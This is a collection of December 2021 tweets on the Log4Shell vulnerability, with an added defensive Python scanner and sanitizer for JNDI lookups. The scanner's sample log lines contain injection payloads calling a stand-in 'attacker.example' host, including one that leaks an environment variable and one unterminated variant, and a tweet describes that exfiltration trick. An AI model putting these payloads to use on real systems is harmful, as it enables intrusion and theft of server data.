Bloomberg: The first person to alert members of an open-source software project who frantically worked to fix a fatal flaw in a widely used software tool was a cloud-security team employee at Alibaba. https://t.co/zdVeKw6KwG
— Vincent Lee (@Rover829) December 14, 2021
.@timstarks got the inside scoop on CISA's call with industry leaders about #log4j today.
— Tonya Riley (@TonyaJoRiley) December 13, 2021
CISA is expecting hundreds of millions of devices are likely to be affected. Cannot overstate the seriousness of this. https://t.co/31vl3HDsYr
Interesting Log4j payload I discovered, simply omit the closing brace }, and now you will potentially get a bunch of data exfiltrated to your server until the next } appears in that data. Had it work on a FANG target... pic.twitter.com/1aR8yLcTbc
— Tom Anthony (@TomAnthonySEO) December 13, 2021
I have an opinion that I’d love to see become a thing.
— Daniel Cuthbert (@dcuthbert) December 14, 2021
Tech firms pay their damn way. This list, and others, show an entire industry that probably spends more on friggin’ giveaways at cons than supporting devs who build their products with open source tool chains. https://t.co/JyfU2fsp9G
Defenders against Log4shell
— Kevin Beaumont (@GossiTheDog) December 14, 2021
I have been working with @CISAgov to produce a validated list of third party products using vulnerable Log4j
✅ find out your exposure and how to fix it
✅ This is work in progress
✅ Bookmark and track situation changes https://t.co/iQNJYsRQVC
We’re working closely with our public and private sector partners to address a critical vulnerability affecting the Apache log4j #software library. This vulnerability is being widely exploited by threat actors and presents an urgent challenge to patch: https://t.co/utbcDZBtPv
— Cybersecurity and Infrastructure Security Agency (@CISAgov) December 13, 2021
1/2
“In the frantic time since the flaw was publicly disclosed, researchers have concluded that the vulnerability had existed in #Log4j since September 2013, apparently unknown to its vast universe of users.” #Apache https://t.co/grxNiYUzTU
— Jamie Tarabay (@jamietarabay) December 14, 2021
This is another mitigation people are putting in - but it depends on a recent version of Log4j to work.
— Kevin Beaumont (@GossiTheDog) December 13, 2021
There’s a lot of placebo effect mitigations happening with Log4Shell, sadly. Even some vendors have issued mitigations that don’t actually work. https://t.co/6Fv5KzkeYJ
Who would ever think that a tool with such polished branding could be the weak link in the collapse of teh innerwebs? https://t.co/YCX2IymeK7 pic.twitter.com/8max4H5pSQ
— random facts girl (@soychicka) December 14, 2021
If you identify a vendor vulnerable to log4Shell and they are not on this list; make a pull request. You'll save some tears from blue teams and IT all over the world: https://t.co/tWQ9CLkzfP
— Jason Haddix (@Jhaddix) December 14, 2021
Not all heroes wear capes...
CISA recommends 3 immediate actions:
— Cybersecurity and Infrastructure Security Agency (@CISAgov) December 13, 2021
1⃣Enumerate internet-facing endpoints that use Log4j.
2⃣Ensure your #SOC is actioning every alert on devices that fall into the category above.
3⃣Install a web application firewall that automatically updates.
2/2
Hard to overstate the severity of the Apache Log4j vulnerability being exploited across critical and industry systems as we speak.
— Nicole Perlroth (@nicoleperlroth) December 14, 2021
CISA Director @CISAJen “one of the most serious I’ve seen in my entire career, if not the most serious.”
https://t.co/TB6xQFh7Wp
We’re giving @Cloudflare customers the option for us to sanitize their logs to protect from down-stream impacts of the #Log4J vulnerability. https://t.co/hRDkyvnxOA
— Matthew Prince (@eastdakota) December 14, 2021
New! Looks like @CISAgov’s #log4j affected software @github repo is up https://t.co/bmntV5ynuI. Useful central compilation of products and guidance.
— Chris Krebs (@C_C_Krebs) December 14, 2021
Good aggregated list of updates from companies and the effect on them from #log4j vulnerability. Exactly the value add that @CISAJen and team should be providing to the world!
— Dmitri Alperovitch (@DAlperovitch) December 14, 2021
Would encourage you to join forces with @GossiTheDog and merge his list in! https://t.co/T8W01PJCdD
We’re seeing over 1,000 attempted exploits of the #Log4J vulnerability per second. Our WAF rules are protecting customers directly, but sanitizing logs helps ensure down-stream log processing isn’t impacted. https://t.co/hRDkyvnxOA
— Matthew Prince (@eastdakota) December 14, 2021
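The unterminated-lookup variant mentioned earlier (a `${jndi:` with no closing brace keeps consuming whatever follows until the next `}`) and the log sanitization described in the tweet above can both be checked with a small scanner. This is an added example, not code from any of the quoted accounts or from Cloudflare; the log lines and the `attacker.example` host are constructed for illustration.

```python
import re

# Constructed sample log lines (not from the page). The last one shows the
# unterminated variant: no closing brace, so the lookup would run into the
# session and token fields that follow it on the line.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /index.html" 200 "Mozilla/5.0"',
    '10.0.0.7 - - "GET /login" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - "GET /api" 500 "${jndi:ldap://attacker.example/${env:HOSTNAME}}"',
    '10.0.0.11 - - "GET /search?q=${jndi:ldap://attacker.example/x" 404 "session=abc123; token=xyz"',
]

# Log4j matches the lookup prefix case-insensitively, so the scan does too.
LOOKUP_START = re.compile(r"\$\{jndi:", re.IGNORECASE)


def find_jndi_lookups(line):
    """Return [(lookup_text, terminated), ...] for each ${jndi:...} in line.

    Braces are matched with nesting, so ${jndi:...${env:X}} counts as one
    lookup. If no closing brace is found the lookup is reported as
    unterminated and its text runs to the end of the line, mirroring how
    the substitution would swallow the trailing data.
    """
    results = []
    for m in LOOKUP_START.finditer(line):
        depth, i = 1, m.end()
        while i < len(line) and depth > 0:
            if line.startswith("${", i):
                depth += 1
                i += 2
                continue
            if line[i] == "}":
                depth -= 1
            i += 1
        results.append((line[m.start():i], depth == 0))
    return results


def sanitize_line(line, marker="[JNDI-LOOKUP-REMOVED]"):
    """Replace every ${jndi:...} lookup, terminated or not, with marker.

    Longest matches are replaced first so an outer lookup that contains a
    nested ${jndi:...} is removed in one piece.
    """
    out = line
    for text, _terminated in sorted(find_jndi_lookups(line), key=lambda t: -len(t[0])):
        out = out.replace(text, marker)
    return out
```

Sanitizing before the line reaches a downstream log pipeline is the defensive counterpart of the WAF rule: it stops a still-unpatched log consumer from evaluating the lookup later.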
Yup. And will uniquely linger like a spore. https://t.co/aAxWcvlSpr
— Matthew Prince (@eastdakota) December 14, 2021
I don't care if #Log4J is supposed to be pronounced as Log-Forge...
— Tinker (@TinkerSec) December 14, 2021
...I'm still gonna pronounce it as Log-Four-Jay.
Same way that Nginx is not Engine-Ex, it's En-Ginx (G pronounced like the G in gif).
Earliest evidence we’ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC. That suggests it was in the wild at least 9 days before publicly disclosed. However, don’t see evidence of mass exploitation until after public disclosure.
— Matthew Prince (@eastdakota) December 11, 2021
Relatedly. I see reports that some sites are seeing as many as 100 attempted hacks per minute, across more than 40% of corporate networks. https://t.co/zQPWuSTMPK
— Paul Kedrosky (@pkedrosky) December 14, 2021
What percentage of Java software can’t be patched because the companies that developed it have lost the source code?
— Matthew Green (@matthew_d_green) December 13, 2021
CISA's recently concluded phone briefing with industry on the Log4j vulnerability sounded some pretty dire notes. Here's what Easterly et al told critical infrastructure folk. https://t.co/B8oEWmgp61
— Tim Starks (@timstarks) December 13, 2021
Bad news for web3 enthusiasts, confirmed successful coin miner attacks using the Log4j vulnerability.
— Nicole Perlroth (@nicoleperlroth) December 14, 2021
Attackers are also dropping:
•Khonsari, new ransomware targeting Windows.
•Orcus, a remote access Trojan.
•Reverse bash shells for future attacks.
(Per @Bitdefender) https://t.co/7LWg41mWND
This list is absolutely mind blowing. I knew log4j affected so many things, but seeing it spelled out like this is crazy https://t.co/nzi2Uzhbur
— William Turton (@WilliamTurton) December 14, 2021
Just added support to LDAP Serialized Payloads in the JNDI-Exploit-Kit. This attack path works in *ANY* java version as long as the classes used in the Serialized payload are in the application classpath. Do not rely on your java version being up-to-date and update your log4j ASAP! pic.twitter.com/z3B2UolisR
— Márcio Almeida (@marcioalm) December 13, 2021
“Some security issues you get are sort of red herrings,” said Gary Gregory, who has worked on the Apache Software Foundation team that maintains #Log4j for nearly a decade. “But this one was, ‘Oh crap.’” #log4shell https://t.co/YtBIsQGszr
— Sean Kerner (@TechJournalist) December 14, 2021
This is such a bad look for a vendor that keeps time and processes payroll. Kronos hit with ransomware, warns of data breach and 'several week' outage https://t.co/bafTjxcZZQ via @ZDNet & @jgreigj https://t.co/tRVBZzZ5xR and community link. https://t.co/i9h4xOeLIe
— Larry Dignan (@ldignan) December 13, 2021
Translation: We know you're probably already on vacation, but can you pretty please do some bare minimum security before Christmas? https://t.co/a4j2qDdj7v
— Emil Protalinski (@EPro) December 15, 2021
Turns out the entire world did not manage to patch every single Java application on earth over the weekend, so things are still on fire in Java land: https://t.co/6ZAYRVuRwD
— Laurie Voss (@seldo) December 13, 2021
Does anyone know how the log4j bug leaked out? Per @TaliaRinger it was reported to the project on 12/6 and then was found in the wild a few days later. Coincidence? Leaked disclosure? Found in the wild?
— Matthew Green (@matthew_d_green) December 13, 2021
What happened?: On Dec. 10th, an acute remote code execution vulnerability was reported in the #Apache logging package Log4j 2 versions 2.14.1. Exploiting this vulnerability allows threat actors to control #java-based web servers and launch #RCE attacks: https://t.co/sE5OvYJrTN pic.twitter.com/c0Gs0Xs0pe
— Check Point Software (@CheckPointSW) December 14, 2021
Mad props to Chen Zhaojun of Alibaba Cloud Security for responsibly disclosing the #log4j vulnerability in private directly to the log4j developers, so that a patch to log4j was released by December 6th, several days before the vulnerability went public.
— Talia Ringer (@TaliaRinger) December 12, 2021
As we were starting to hear over the weekend, updating JVM version is no longer an effective mitigation. Continue focusing on patching the root cause! https://t.co/taSjdTvKA5
— Chris Eng (@chriseng) December 13, 2021
CISA has told federal civilian agencies to patch systems affected by the Log4Shell vulnerability by Christmas Eve https://t.co/n9YtrVgcCq
— The Record by Recorded Future (@TheRecord_Media) December 14, 2021
CISA tells federal agencies to patch Log4Shell before Christmas (by Dec 24, 2021) https://t.co/XTWMdhqTcA pic.twitter.com/1QvhdIyKIN
— Catalin Cimpanu (@campuscodi) December 14, 2021
CISA tells federal agencies to patch Log4Shell before Christmas https://t.co/y9Ef9Tk4xv pic.twitter.com/JokQemF5VI
— Hiram Alejandro (@hiramcoop) December 14, 2021
ICYMI: Google Ads not affected by Log4j 2 vulnerability https://t.co/frcuUFjA2D pic.twitter.com/rdaXtqlQxs
— Barry Schwartz (@rustybrick) December 14, 2021
Google says Google Ads not affected by Log4j 2 vulnerability https://t.co/frcuUFBaUb pic.twitter.com/PNkXvavvUc
— Barry Schwartz (@rustybrick) December 14, 2021
CISA Creates Webpage for Apache Log4j Vulnerability CVE-2021-44228 https://t.co/TdyjE0aEzj @CISAgov
— 780th Military Intelligence Brigade (Cyber) (@780thC) December 14, 2021
#CISA created a webpage called Apache #Log4j Vulnerability Guidance and will actively maintain a community-sourced GitHub repository of publicly available information and vendor-supplied advisories regarding the Log4j flaw. https://t.co/5RllGpaisf
— Lindsey O'Donnell Welch (@LindseyOD123) December 14, 2021
Further to the recent vulnerability announcement https://t.co/0z74LyiOxL
— KAPPTURE (@Kappture1) December 14, 2021
Kappture does not use the 3rd party log4j library in its products. There is no action required by Kappture or any of its clients. #Hospitality #Tech #Security #CISA #log4j pic.twitter.com/O9kNsIqkP7
CISA creates vulnerability guidance webpage for the Apache Log4j vulnerability - CVE-2021-44228 https://t.co/sF2sbHGrqI #CVE #Vulnerability #InfoSec #CyberSecurity @CVEnew
— CVE Announcements (@CVEannounce) December 14, 2021
CISA Creates Webpage for Apache Log4j Vulnerability CVE-2021-44228 | @CISAInfraSec https://t.co/v8Aojqq5t7
— Justin (@xxdesmus) December 14, 2021
#Log4Shell: We Are in So Much Trouble, by @sjvn at @thenewstack https://t.co/Z2fnfQawdn
— Robert Cathey (he/him) (@robertcathey) December 14, 2021
Log4Shell: We Are in so Much Trouble https://t.co/fFhnj5Mk87 via @thenewstack & @sjvn #Log4Shell may, with no exaggeration, be the worst IT #security problem of our generation. Here's what it is and what you can do about it. #log4j
— Steven J. Vaughan-Nichols (@sjvn) December 14, 2021
Attackers Target #log4j to Drop #ransomware, Web Shells, #Backdoors
— (@bamitav) December 15, 2021
https://t.co/KH8HQQ1WNm #100DaysOfCode #bot #CodeNewbie #Developers #bugbounty #CyberAttack #cybersecurity #Security #infosec #OpenSource #Python #javascript #tech #DataSecurity #Malware #hacker #privacy #CISOs